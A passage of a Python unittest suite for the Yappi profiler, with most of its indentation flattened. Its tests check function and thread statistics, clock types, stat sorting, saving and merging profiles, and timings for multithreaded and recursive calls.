else:
import unittest as _unittest
class BasicUsage(utils.YappiUnitTestCase):
def test_print_formatting(self):
def a():
pass
def b():
a()
func_cols={1:("name",48), 0:("ncall", 5), 2:("tsub", 8),}
thread_cols = {1:("name", 48), 0:("ttot", 8), }
yappi.start()
a(); b();
yappi.stop()
fs = yappi.get_func_stats()
cs = fs[1].children
ts = yappi.get_thread_stats()
#fs.print_all(out=sys.stderr, columns={1:("name", 70), })
#cs.print_all(out=sys.stderr, columns=func_cols)
#ts.print_all(out=sys.stderr, columns=thread_cols)
#cs.print_all(out=sys.stderr, columns={})
self.assertRaises(yappi.YappiError, fs.print_all, columns={1:("namee",9)})
self.assertRaises(yappi.YappiError, cs.print_all, columns={1:("dd",0)})
self.assertRaises(yappi.YappiError, ts.print_all, columns={1:("tidd",0)})
def test_get_clock(self):
yappi.set_clock_type('cpu')
self.assertEqual('cpu', yappi.get_clock_type())
clock_info = yappi.get_clock_info()
self.assertTrue('api' in clock_info)
self.assertTrue('resolution' in clock_info)
yappi.set_clock_type('wall')
self.assertEqual('wall', yappi.get_clock_type())
t0 = yappi.get_clock_time()
time.sleep(0.1)
duration = yappi.get_clock_time() - t0
self.assertAlmostEqual(0.1, duration, places=2)
def test_profile_decorator(self):
def aggregate(func, stats):
fname = "%s.profile" % (func.__name__)
try:
stats.add(fname)
except IOError:
pass
stats.save(fname)
raise Exception("messing around")
@yappi.profile(return_callback=aggregate)
def a(x, y):
if x+y == 25:
raise Exception("")
return x+y
def b():
pass
try:
os.remove("a.profile") # remove the one from prev test, if available
except:
pass
# global profile is on to mess things up
yappi.start()
b()
# assert functionality and call function at same time
try:
self.assertEqual(a(1, 2), 3)
except:
pass
try:
self.assertEqual(a(2, 5), 7)
except:
pass
try:
a(4, 21)
except:
pass
stats = yappi.get_func_stats().add("a.profile")
fsa = utils.find_stat_by_name(stats, 'a')
self.assertEqual(fsa.ncall, 3)
self.assertEqual(len(stats), 1) # b() should be cleared out.
@yappi.profile(return_callback=aggregate)
def count_down_rec(n):
if n == 0:
return
count_down_rec(n-1)
try:
os.remove("count_down_rec.profile") # remove the one from prev test, if available
except:
pass
try:
count_down_rec(4)
except:
pass
try:
count_down_rec(3)
except:
pass
stats = yappi.YFuncStats("count_down_rec.profile")
fsrec = utils.find_stat_by_name(stats, 'count_down_rec')
self.assertEqual(fsrec.ncall, 9)
self.assertEqual(fsrec.nactualcall, 2)
def test_strip_dirs(self):
def a():
pass
stats = utils.run_and_get_func_stats(a,)
stats.strip_dirs()
fsa = utils.find_stat_by_name(stats, "a")
self.assertEqual(fsa.module, os.path.basename(fsa.module))
def test_yappi_overhead(self):
import time
LOOP_COUNT = 10000
def a(): pass
def b():
for i in range(LOOP_COUNT): a()
t0 = time.time()
yappi.start()
b()
yappi.stop()
time_with_yappi = time.time() - t0
t0 = time.time()
b()
time_without_yappi = time.time() - t0
if time_without_yappi == 0:
time_without_yappi = 0.000001
        # In the latest v0.82, I measured this as close to 7.0x on my machine.
        # However, 83% of this overhead comes from tickcount(); the other 17%
        # seems to be evenly distributed over the internal bookkeeping
        # structures/algorithms, which seems acceptable. Note that our test
        # only profiles one function at a time over a short interval.
        # Profiling a high number of functions in a small time is a different
        # beast (and pretty unlikely in most applications). So, as a
        # conclusion: I cannot see any optimization window for Yappi worth
        # implementing, as we would only be optimizing 17% of the time.
        sys.stderr.write("\r\nYappi adds %0.1fx overhead to the profiled application on average.\r\n" %
                         (time_with_yappi / time_without_yappi))
def test_clear_stats_while_running(self):
def a():
pass
yappi.start()
a()
yappi.clear_stats()
a()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
self.assertEqual(fsa.ncall, 1)
def test_generator(self):
def _gen(n):
while(n > 0):
yield n
n -= 1
yappi.start()
for x in _gen(5):
pass
self.assertTrue(yappi.convert2pstats(yappi.get_func_stats()) is not None)
def test_slice_child_stats_and_strip_dirs(self):
def b():
for i in range(10000000): pass
def a():
b()
yappi.start(builtins=True)
a()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
self.assertTrue(fsa.children[0:1] is not None)
prev_afullname = fsa.full_name
prev_bchildfullname = fsa.children[fsb].full_name
stats.strip_dirs()
self.assertTrue(len(prev_afullname) > len(fsa.full_name))
self.assertTrue(len(prev_bchildfullname) > len(fsa.children[fsb].full_name))
def test_children_stat_functions(self):
_timings = {"a_1":5, "b_1":3, "c_1":1}
_yappi._set_test_timings(_timings)
def b():
pass
def c():
pass
def a():
b()
c()
yappi.start()
a()
b() # non-child call
c() # non-child call
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
childs_of_a = fsa.children.get().sort("tavg", "desc")
prev_item = None
for item in childs_of_a:
if prev_item:
self.assertTrue(prev_item.tavg > item.tavg)
prev_item = item
childs_of_a.sort("name", "desc")
prev_item = None
for item in childs_of_a:
if prev_item:
self.assertTrue(prev_item.name > item.name)
prev_item = item
childs_of_a.clear()
self.assertTrue(childs_of_a.empty())
def test_no_stats_different_clock_type_load(self):
def a(): pass
yappi.start()
a()
yappi.stop()
yappi.get_func_stats().save("ystats1.ys")
yappi.clear_stats()
yappi.set_clock_type("WALL")
yappi.start()
yappi.stop()
stats = yappi.get_func_stats().add("ystats1.ys")
fsa = utils.find_stat_by_name(stats, 'a')
self.assertTrue(fsa is not None)
def test_subsequent_profile(self):
_timings = {"a_1":1, "b_1":1}
_yappi._set_test_timings(_timings)
def a(): pass
def b(): pass
yappi.start()
a()
yappi.stop()
yappi.start()
b()
yappi.stop()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
self.assertTrue(fsa is not None)
self.assertTrue(fsb is not None)
self.assertEqual(fsa.ttot, 1)
self.assertEqual(fsb.ttot, 1)
def test_lambda(self):
import time
f = lambda : time.sleep(0.3)
yappi.set_clock_type("wall")
yappi.start()
f()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, '<lambda>')
self.assertTrue(fsa.ttot > 0.1)
def test_module_stress(self):
self.assertEqual(yappi.is_running(), False)
yappi.start()
yappi.clear_stats()
self.assertRaises(_yappi.error, yappi.set_clock_type, "wall")
yappi.stop()
yappi.clear_stats()
yappi.set_clock_type("cpu")
self.assertRaises(yappi.YappiError, yappi.set_clock_type, "dummy")
self.assertEqual(yappi.is_running(), False)
yappi.clear_stats()
yappi.clear_stats()
def test_stat_sorting(self):
_timings = {"a_1":13,"b_1":10,"a_2":6,"b_2":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
b()
def b():
if self._ncall == 2:
return
self._ncall += 1
a()
stats = utils.run_and_get_func_stats(a)
stats = stats.sort("totaltime", "desc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.ttot >= stat.ttot)
prev_stat = stat
stats = stats.sort("totaltime", "asc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.ttot <= stat.ttot)
prev_stat = stat
stats = stats.sort("avgtime", "asc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.tavg <= stat.tavg)
prev_stat = stat
stats = stats.sort("name", "asc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.name <= stat.name)
prev_stat = stat
stats = stats.sort("subtime", "asc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.tsub <= stat.tsub)
prev_stat = stat
self.assertRaises(yappi.YappiError, stats.sort, "invalid_func_sorttype_arg")
self.assertRaises(yappi.YappiError, stats.sort, "totaltime", "invalid_func_sortorder_arg")
def test_start_flags(self):
self.assertEqual(_yappi._get_start_flags(), None)
yappi.start()
def a(): pass
a()
self.assertEqual(_yappi._get_start_flags()["profile_builtins"], 0)
self.assertEqual(_yappi._get_start_flags()["profile_multithread"], 1)
self.assertEqual(len(yappi.get_thread_stats()), 1)
def test_builtin_profiling(self):
import threading
def a():
import time
time.sleep(0.4) # is a builtin function
yappi.set_clock_type('wall')
yappi.start(builtins=True)
a()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'sleep')
self.assertTrue(fsa is not None)
self.assertTrue(fsa.ttot > 0.3)
yappi.stop()
yappi.clear_stats()
def a():
pass
yappi.start()
t = threading.Thread(target=a)
t.start()
t.join()
stats = yappi.get_func_stats()
def test_singlethread_profiling(self):
import threading
import time
yappi.set_clock_type('wall')
def a():
time.sleep(0.2)
class Worker1(threading.Thread):
def a(self):
time.sleep(0.3)
def run(self):
self.a()
yappi.start(profile_threads=False)
c = Worker1()
c.start()
c.join()
a()
stats = yappi.get_func_stats()
fsa1 = utils.find_stat_by_name(stats, 'Worker1.a')
fsa2 = utils.find_stat_by_name(stats, 'a')
self.assertTrue(fsa1 is None)
self.assertTrue(fsa2 is not None)
self.assertTrue(fsa2.ttot > 0.1)
class StatSaveScenarios(utils.YappiUnitTestCase):
def test_pstats_conversion(self):
def pstat_id(fs):
return (fs.module, fs.lineno, fs.name)
def a():
d()
def b():
d()
def c():
pass
def d():
pass
_timings = {"a_1":12,"b_1":7,"c_1":5,"d_1":2}
_yappi._set_test_timings(_timings)
stats = utils.run_and_get_func_stats(a,)
stats.strip_dirs()
stats.save("a1.pstats", type="pstat")
fsa_pid = pstat_id(utils.find_stat_by_name(stats, "a"))
fsd_pid = pstat_id(utils.find_stat_by_name(stats, "d"))
yappi.clear_stats()
_yappi._set_test_timings(_timings)
stats = utils.run_and_get_func_stats(a,)
stats.strip_dirs()
stats.save("a2.pstats", type="pstat")
yappi.clear_stats()
_yappi._set_test_timings(_timings)
stats = utils.run_and_get_func_stats(b,)
stats.strip_dirs()
stats.save("b1.pstats", type="pstat")
fsb_pid = pstat_id(utils.find_stat_by_name(stats, "b"))
yappi.clear_stats()
_yappi._set_test_timings(_timings)
stats = utils.run_and_get_func_stats(c,)
stats.strip_dirs()
stats.save("c1.pstats", type="pstat")
fsc_pid = pstat_id(utils.find_stat_by_name(stats, "c"))
# merge saved stats and check pstats values are correct
import pstats
p = pstats.Stats('a1.pstats', 'a2.pstats', 'b1.pstats', 'c1.pstats')
p.strip_dirs()
# ct = ttot, tt = tsub
(cc, nc, tt, ct, callers) = p.stats[fsa_pid]
self.assertEqual(cc, nc, 2)
self.assertEqual(tt, 20)
self.assertEqual(ct, 24)
(cc, nc, tt, ct, callers) = p.stats[fsd_pid]
self.assertEqual(cc, nc, 3)
self.assertEqual(tt, 6)
self.assertEqual(ct, 6)
self.assertEqual(len(callers), 2)
(cc, nc, tt, ct) = callers[fsa_pid]
self.assertEqual(cc, nc, 2)
self.assertEqual(tt, 4)
self.assertEqual(ct, 4)
(cc, nc, tt, ct) = callers[fsb_pid]
self.assertEqual(cc, nc, 1)
self.assertEqual(tt, 2)
self.assertEqual(ct, 2)
def test_merge_stats(self):
_timings = {"a_1":15,"b_1":14,"c_1":12,"d_1":10,"e_1":9,"f_1":7,"g_1":6,"h_1":5,"i_1":1}
_yappi._set_test_timings(_timings)
def a():
b()
def b():
c()
def c():
d()
def d():
e()
def e():
f()
def f():
g()
def g():
h()
def h():
i()
def i():
pass
yappi.start()
a()
a()
yappi.stop()
stats = yappi.get_func_stats()
self.assertRaises(NotImplementedError, stats.save, "", "INVALID_SAVE_TYPE")
stats.save("ystats2.ys")
yappi.clear_stats()
_yappi._set_test_timings(_timings)
yappi.start()
a()
stats = yappi.get_func_stats().add("ystats2.ys")
fsa = utils.find_stat_by_name(stats, "a")
fsb = utils.find_stat_by_name(stats, "b")
fsc = utils.find_stat_by_name(stats, "c")
fsd = utils.find_stat_by_name(stats, "d")
fse = utils.find_stat_by_name(stats, "e")
fsf = utils.find_stat_by_name(stats, "f")
fsg = utils.find_stat_by_name(stats, "g")
fsh = utils.find_stat_by_name(stats, "h")
fsi = utils.find_stat_by_name(stats, "i")
self.assertEqual(fsa.ttot, 45)
self.assertEqual(fsa.ncall, 3)
self.assertEqual(fsa.nactualcall, 3)
self.assertEqual(fsa.tsub, 3)
self.assertEqual(fsa.children[fsb].ttot, fsb.ttot)
self.assertEqual(fsa.children[fsb].tsub, fsb.tsub)
self.assertEqual(fsb.children[fsc].ttot, fsc.ttot)
self.assertEqual(fsb.children[fsc].tsub, fsc.tsub)
self.assertEqual(fsc.tsub, 6)
self.assertEqual(fsc.children[fsd].ttot, fsd.ttot)
self.assertEqual(fsc.children[fsd].tsub, fsd.tsub)
self.assertEqual(fsd.children[fse].ttot, fse.ttot)
self.assertEqual(fsd.children[fse].tsub, fse.tsub)
self.assertEqual(fse.children[fsf].ttot, fsf.ttot)
self.assertEqual(fse.children[fsf].tsub, fsf.tsub)
self.assertEqual(fsf.children[fsg].ttot, fsg.ttot)
self.assertEqual(fsf.children[fsg].tsub, fsg.tsub)
self.assertEqual(fsg.ttot, 18)
self.assertEqual(fsg.tsub, 3)
self.assertEqual(fsg.children[fsh].ttot, fsh.ttot)
self.assertEqual(fsg.children[fsh].tsub, fsh.tsub)
self.assertEqual(fsh.ttot, 15)
self.assertEqual(fsh.tsub, 12)
self.assertEqual(fsh.tavg, 5)
self.assertEqual(fsh.children[fsi].ttot, fsi.ttot)
self.assertEqual(fsh.children[fsi].tsub, fsi.tsub)
#stats.debug_print()
def test_merge_multithreaded_stats(self):
import threading
import _yappi
timings = {"a_1":2, "b_1":1}
_yappi._set_test_timings(timings)
def a(): pass
def b(): pass
yappi.start()
t = threading.Thread(target=a)
t.start()
t.join()
t = threading.Thread(target=b)
t.start()
t.join()
yappi.get_func_stats().save("ystats1.ys")
yappi.clear_stats()
_yappi._set_test_timings(timings)
self.assertEqual(len(yappi.get_func_stats()), 0)
self.assertEqual(len(yappi.get_thread_stats()), 1)
t = threading.Thread(target=a)
t.start()
t.join()
self.assertEqual(_yappi._get_start_flags()["profile_builtins"], 0)
self.assertEqual(_yappi._get_start_flags()["profile_multithread"], 1)
yappi.get_func_stats().save("ystats2.ys")
stats = yappi.YFuncStats(["ystats1.ys", "ystats2.ys",])
fsa = utils.find_stat_by_name(stats, "a")
fsb = utils.find_stat_by_name(stats, "b")
self.assertEqual(fsa.ncall, 2)
self.assertEqual(fsb.ncall, 1)
self.assertEqual(fsa.tsub, fsa.ttot, 4)
self.assertEqual(fsb.tsub, fsb.ttot, 1)
def test_merge_load_different_clock_types(self):
import threading
yappi.start(builtins=True)
def a(): b()
def b(): c()
def c(): pass
t = threading.Thread(target=a)
t.start()
t.join()
yappi.get_func_stats().sort("name", "asc").save("ystats1.ys")
yappi.stop()
yappi.clear_stats()
yappi.start(builtins=False)
t = threading.Thread(target=a)
t.start()
t.join()
yappi.get_func_stats().save("ystats2.ys")
yappi.stop()
self.assertRaises(_yappi.error, yappi.set_clock_type, "wall")
yappi.clear_stats()
yappi.set_clock_type("wall")
yappi.start()
t = threading.Thread(target=a)
t.start()
t.join()
yappi.get_func_stats().save("ystats3.ys")
self.assertRaises(yappi.YappiError, yappi.YFuncStats().add("ystats1.ys").add, "ystats3.ys")
stats = yappi.YFuncStats(["ystats1.ys", "ystats2.ys"]).sort("name")
fsa = utils.find_stat_by_name(stats, "a")
fsb = utils.find_stat_by_name(stats, "b")
fsc = utils.find_stat_by_name(stats, "c")
self.assertEqual(fsa.ncall, 2)
self.assertEqual(fsa.ncall, fsb.ncall, fsc.ncall)
def test_merge_aabab_aabbc(self):
_timings = {"a_1":15,"a_2":14,"b_1":12,"a_3":10,"b_2":9, "c_1":4}
_yappi._set_test_timings(_timings)
def a():
if self._ncall == 1:
self._ncall += 1
a()
elif self._ncall == 5:
self._ncall += 1
a()
else:
b()
def b():
if self._ncall == 2:
self._ncall += 1
a()
elif self._ncall == 6:
self._ncall += 1
b()
elif self._ncall == 7:
c()
else:
return
def c():
pass
self._ncall = 1
stats = utils.run_and_get_func_stats(a,)
stats.save("ystats1.ys")
yappi.clear_stats()
_yappi._set_test_timings(_timings)
#stats.print_all()
self._ncall = 5
stats = utils.run_and_get_func_stats(a,)
stats.save("ystats2.ys")
#stats.print_all()
def a(): # same name but another function(code object)
pass
yappi.start()
a()
stats = yappi.get_func_stats().add(["ystats1.ys", "ystats2.ys"])
#stats.print_all()
self.assertEqual(len(stats), 4)
fsa = None
for stat in stats:
if stat.name == "a" and stat.ttot == 45:
fsa = stat
break
self.assertTrue(fsa is not None)
self.assertEqual(fsa.ncall, 7)
self.assertEqual(fsa.nactualcall, 3)
self.assertEqual(fsa.ttot, 45)
self.assertEqual(fsa.tsub, 10)
fsb = utils.find_stat_by_name(stats, "b")
fsc = utils.find_stat_by_name(stats, "c")
self.assertEqual(fsb.ncall, 6)
self.assertEqual(fsb.nactualcall, 3)
self.assertEqual(fsb.ttot, 36)
self.assertEqual(fsb.tsub, 27)
self.assertEqual(fsb.tavg, 6)
self.assertEqual(fsc.ttot, 8)
self.assertEqual(fsc.tsub, 8)
self.assertEqual(fsc.tavg, 4)
self.assertEqual(fsc.nactualcall, fsc.ncall, 2)
"""
"""
class MultithreadedScenarios(utils.YappiUnitTestCase):
def test_subsequent_profile(self):
import threading
WORKER_COUNT = 5
def a(): pass
def b(): pass
def c(): pass
_timings = {"a_1":3,"b_1":2,"c_1":1,}
yappi.start()
def g(): pass
g()
yappi.stop()
yappi.clear_stats()
_yappi._set_test_timings(_timings)
yappi.start()
_dummy = []
for i in range(WORKER_COUNT):
t = threading.Thread(target=a)
t.start()
t.join()
for i in range(WORKER_COUNT):
t = threading.Thread(target=b)
t.start()
_dummy.append(t)
t.join()
for i in range(WORKER_COUNT):
t = threading.Thread(target=a)
t.start()
t.join()
for i in range(WORKER_COUNT):
t = threading.Thread(target=c)
t.start()
t.join()
yappi.stop()
yappi.start()
def f():
pass
f()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
self.assertEqual(fsa.ncall, 10)
self.assertEqual(fsb.ncall, 5)
self.assertEqual(fsc.ncall, 5)
self.assertEqual(fsa.ttot, fsa.tsub, 30)
self.assertEqual(fsb.ttot, fsb.tsub, 10)
self.assertEqual(fsc.ttot, fsc.tsub, 5)
        # macOS may optimize by creating only one worker thread
self.assertTrue(len(yappi.get_thread_stats()) >= 2)
def test_basic(self):
import threading
import time
yappi.set_clock_type('wall')
def a():
time.sleep(0.2)
class Worker1(threading.Thread):
def a(self):
time.sleep(0.3)
def run(self):
self.a()
yappi.start(builtins=False, profile_threads=True)
c = Worker1()
c.start()
c.join()
a()
stats = yappi.get_func_stats()
fsa1 = utils.find_stat_by_name(stats, 'Worker1.a')
fsa2 = utils.find_stat_by_name(stats, 'a')
self.assertTrue(fsa1 is not None)
self.assertTrue(fsa2 is not None)
self.assertTrue(fsa1.ttot > 0.2)
self.assertTrue(fsa2.ttot > 0.1)
tstats = yappi.get_thread_stats()
self.assertEqual(len(tstats), 2)
tsa = utils.find_stat_by_name(tstats, 'Worker1')
tsm = utils.find_stat_by_name(tstats, '_MainThread')
self.assertTrue(tsa is not None)
        self.assertTrue(tsm is not None)  # FIX: I see this fail sometimes?
def test_ctx_stats(self):
from threading import Thread
DUMMY_WORKER_COUNT = 5
yappi.start()
class DummyThread(Thread): pass
def dummy_worker():
pass
for i in range(DUMMY_WORKER_COUNT):
t = DummyThread(target=dummy_worker)
t.start()
t.join()
yappi.stop()
stats = yappi.get_thread_stats()
tsa = utils.find_stat_by_name(stats, "DummyThread")
self.assertTrue(tsa is not None)
yappi.clear_stats()
import time
time.sleep(1.0)
_timings = {"a_1":6,"b_1":5,"c_1":3, "d_1":1, "a_2":4,"b_2":3,"c_2":2, "d_2":1}
_yappi._set_test_timings(_timings)
class Thread1(Thread): pass
class Thread2(Thread): pass
def a():
b()
def b():
c()
def c():
d()
def d():
time.sleep(0.6)
yappi.set_clock_type("wall")
yappi.start()
t1 = Thread1(target=a)
t1.start()
t2 = Thread2(target=a)
t2.start()
t1.join()
t2.join()
stats = yappi.get_thread_stats()
        # the first clear_stats() call should have cleared the context table
tsa = utils.find_stat_by_name(stats, "DummyThread")
self.assertTrue(tsa is None)
tst1 = utils.find_stat_by_name(stats, "Thread1")
tst2 = utils.find_stat_by_name(stats, "Thread2")
tsmain = utils.find_stat_by_name(stats, "_MainThread")
#stats.print_all()
self.assertTrue(len(stats) == 3)
self.assertTrue(tst1 is not None)
self.assertTrue(tst2 is not None)
        self.assertTrue(tsmain is not None)  # I see this fail sometimes,
        # probably because Py_ImportNoBlock() fails to import and get the
        # thread class name.
self.assertTrue(1.0 > tst2.ttot >= 0.5)
self.assertTrue(1.0 > tst1.ttot >= 0.5)
# test sorting of the ctx stats
stats = stats.sort("totaltime", "desc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.ttot >= stat.ttot)
prev_stat = stat
stats = stats.sort("totaltime", "asc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.ttot <= stat.ttot)
prev_stat = stat
stats = stats.sort("schedcount", "desc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.sched_count >= stat.sched_count)
prev_stat = stat
stats = stats.sort("name", "desc")
prev_stat = None
for stat in stats:
if prev_stat:
self.assertTrue(prev_stat.name >= stat.name)
prev_stat = stat
self.assertRaises(yappi.YappiError, stats.sort, "invalid_thread_sorttype_arg")
self.assertRaises(yappi.YappiError, stats.sort, "invalid_thread_sortorder_arg")
def test_producer_consumer_with_queues(self):
# we currently just stress yappi, no functionality test is done here.
yappi.start()
import time
if utils.is_py3x():
from queue import Queue
else:
from Queue import Queue
from threading import Thread
WORKER_THREAD_COUNT = 50
WORK_ITEM_COUNT = 2000
def worker():
while True:
item = q.get()
# do the work with item
q.task_done()
q = Queue()
for i in range(WORKER_THREAD_COUNT):
t = Thread(target=worker)
t.daemon = True
t.start()
for item in range(WORK_ITEM_COUNT):
q.put(item)
        q.join()  # block until all tasks are done
#yappi.get_func_stats().sort("callcount").print_all()
yappi.stop()
def test_temporary_lock_waiting(self):
import threading
import time
yappi.start()
_lock = threading.Lock()
def worker():
_lock.acquire()
try:
time.sleep(1.0)
finally:
_lock.release()
t1 = threading.Thread(target=worker)
t2 = threading.Thread(target=worker)
t1.start()
t2.start()
t1.join()
t2.join()
#yappi.get_func_stats().sort("callcount").print_all()
yappi.stop()
    @_unittest.skipIf(os.name != "posix", "requires POSIX-compliant OS")
def test_signals_with_blocking_calls(self):
import signal, os, time
        # just to verify that the signal is handled correctly and yappi stats
        # are not corrupted.
def handler(signum, frame):
raise Exception("Signal handler executed!")
yappi.start()
signal.signal(signal.SIGALRM, handler)
signal.alarm(1)
self.assertRaises(Exception, time.sleep, 2)
stats = yappi.get_func_stats()
fsh = utils.find_stat_by_name(stats, "handler")
self.assertTrue(fsh is not None)
@_unittest.skipIf(not sys.version_info >= (3, 2), "requires Python 3.2")
def test_concurrent_futures(self):
yappi.start()
import time
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(max_workers=5) as executor:
f = executor.submit(pow, 5, 2)
self.assertEqual(f.result(), 25)
time.sleep(1.0)
yappi.stop()
@_unittest.skipIf(not sys.version_info >= (3, 2), "requires Python 3.2")
def test_barrier(self):
yappi.start()
import threading
b = threading.Barrier(2, timeout=1)
def worker():
try:
b.wait()
except threading.BrokenBarrierError:
pass
except Exception:
raise Exception("BrokenBarrierError not raised")
t1 = threading.Thread(target=worker)
t1.start()
#b.wait()
t1.join()
yappi.stop()
class NonRecursiveFunctions(utils.YappiUnitTestCase):
def test_abcd(self):
_timings = {"a_1":6,"b_1":5,"c_1":3, "d_1":1}
_yappi._set_test_timings(_timings)
def a():
b()
def b():
c()
def c():
d()
def d():
pass
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
fsd = utils.find_stat_by_name(stats, 'd')
cfsab = fsa.children[fsb]
cfsbc = fsb.children[fsc]
cfscd = fsc.children[fsd]
self.assertEqual(fsa.ttot , 6)
self.assertEqual(fsa.tsub , 1)
self.assertEqual(fsb.ttot , 5)
self.assertEqual(fsb.tsub , 2)
self.assertEqual(fsc.ttot , 3)
self.assertEqual(fsc.tsub , 2)
self.assertEqual(fsd.ttot , 1)
self.assertEqual(fsd.tsub , 1)
self.assertEqual(cfsab.ttot , 5)
self.assertEqual(cfsab.tsub , 2)
self.assertEqual(cfsbc.ttot , 3)
self.assertEqual(cfsbc.tsub , 2)
self.assertEqual(cfscd.ttot , 1)
self.assertEqual(cfscd.tsub , 1)
def test_stop_in_middle(self):
import time
_timings = {"a_1":6,"b_1":4}
_yappi._set_test_timings(_timings)
def a():
b()
yappi.stop()
def b():
time.sleep(0.2)
yappi.start()
a()
stats = yappi.get_func_stats()
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
self.assertEqual(fsa.ncall , 1)
self.assertEqual(fsa.nactualcall, 0)
self.assertEqual(fsa.ttot , 0) # no call_leave called
self.assertEqual(fsa.tsub , 0) # no call_leave called
self.assertEqual(fsb.ttot , 4)
class RecursiveFunctions(utils.YappiUnitTestCase):
def test_fibonacci(self):
def fib(n):
if n > 1:
return fib(n-1) + fib(n-2)
else:
return n
stats = utils.run_and_get_func_stats(fib, 22)
fs = utils.find_stat_by_name(stats, 'fib')
self.assertEqual(fs.ncall, 57313)
self.assertEqual(fs.ttot, fs.tsub)
def test_abcadc(self):
_timings = {"a_1":20,"b_1":19,"c_1":17, "a_2":13, "d_1":12, "c_2":10, "a_3":5}
_yappi._set_test_timings(_timings)
def a(n):
if n == 3:
return
            if n == 2:
d(n)
else:
b(n)
def b(n):
c(n)
def c(n):
a(n+1)
def d(n):
c(n)
stats = utils.run_and_get_func_stats(a, 1)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
fsd = utils.find_stat_by_name(stats, 'd')
self.assertEqual(fsa.ncall, 3)
self.assertEqual(fsa.nactualcall, 1)
self.assertEqual(fsa.ttot, 20)
self.assertEqual(fsa.tsub, 7)
self.assertEqual(fsb.ttot, 19)
self.assertEqual(fsb.tsub, 2)
self.assertEqual(fsc.ttot, 17)
self.assertEqual(fsc.tsub, 9)
self.assertEqual(fsd.ttot, 12)
self.assertEqual(fsd.tsub, 2)
cfsca = fsc.children[fsa]
self.assertEqual(cfsca.nactualcall, 0)
self.assertEqual(cfsca.ncall, 2)
self.assertEqual(cfsca.ttot, 13)
self.assertEqual(cfsca.tsub, 6)
def test_aaaa(self):
_timings = {"d_1":9, "d_2":7, "d_3":3, "d_4":2}
_yappi._set_test_timings(_timings)
def d(n):
if n == 3:
return
d(n+1)
stats = utils.run_and_get_func_stats(d, 0)
fsd = utils.find_stat_by_name(stats, 'd')
self.assertEqual(fsd.ncall , 4)
self.assertEqual(fsd.nactualcall , 1)
self.assertEqual(fsd.ttot , 9)
self.assertEqual(fsd.tsub , 9)
cfsdd = fsd.children[fsd]
self.assertEqual(cfsdd.ttot , 7)
self.assertEqual(cfsdd.tsub , 7)
self.assertEqual(cfsdd.ncall , 3)
self.assertEqual(cfsdd.nactualcall , 0)
def test_abcabc(self):
_timings = {"a_1":20,"b_1":19,"c_1":17, "a_2":13, "b_2":11, "c_2":9, "a_3":6}
_yappi._set_test_timings(_timings)
def a(n):
if n == 3:
return
else:
b(n)
def b(n):
c(n)
def c(n):
a(n+1)
stats = utils.run_and_get_func_stats(a, 1)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
self.assertEqual(fsa.ncall , 3)
self.assertEqual(fsa.nactualcall , 1)
self.assertEqual(fsa.ttot , 20)
self.assertEqual(fsa.tsub , 9)
self.assertEqual(fsb.ttot , 19)
self.assertEqual(fsb.tsub , 4)
self.assertEqual(fsc.ttot , 17)
self.assertEqual(fsc.tsub , 7)
cfsab = fsa.children[fsb]
cfsbc = fsb.children[fsc]
cfsca = fsc.children[fsa]
self.assertEqual(cfsab.ttot , 19)
self.assertEqual(cfsab.tsub , 4)
self.assertEqual(cfsbc.ttot , 17)
self.assertEqual(cfsbc.tsub , 7)
self.assertEqual(cfsca.ttot , 13)
self.assertEqual(cfsca.tsub , 8)
def test_abcbca(self):
_timings = {"a_1":10,"b_1":9,"c_1":7,"b_2":4,"c_2":2,"a_2":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 1:
b()
else:
return
def b():
c()
def c():
if self._ncall == 1:
self._ncall += 1
b()
else:
a()
stats = utils.run_and_get_func_stats(a)
fsa = utils.find_stat_by_name(stats, 'a')
fsb = utils.find_stat_by_name(stats, 'b')
fsc = utils.find_stat_by_name(stats, 'c')
cfsab = fsa.children[fsb]
cfsbc = fsb.children[fsc]
cfsca = fsc.children[fsa]
self.assertEqual(fsa.ttot , 10)
self.assertEqual(fsa.tsub , 2)
self.assertEqual(fsb.ttot , 9)
self.assertEqual(fsb.tsub , 4)
self.assertEqual(fsc.ttot , 7)
self.assertEqual(fsc.tsub , 4)
self.assertEqual(cfsab.ttot , 9)
self.assertEqual(cfsab.tsub , 2)
self.assertEqual(cfsbc.ttot , 7)
self.assertEqual(cfsbc.tsub , 4)
self.assertEqual(cfsca.ttot , 1)
self.assertEqual(cfsca.tsub , 1)
self.assertEqual(cfsca.ncall , 1)
self.assertEqual(cfsca.nactualcall , 0)
def test_aabccb(self):
_timings = {"a_1":13,"a_2":11,"b_1":9,"c_1":5,"c_2":3,"b_2":1}
_yappi._set_test_timings(_timings)
self._ncall = 1
def a():
if self._ncall == 1:
self._ncall += 1
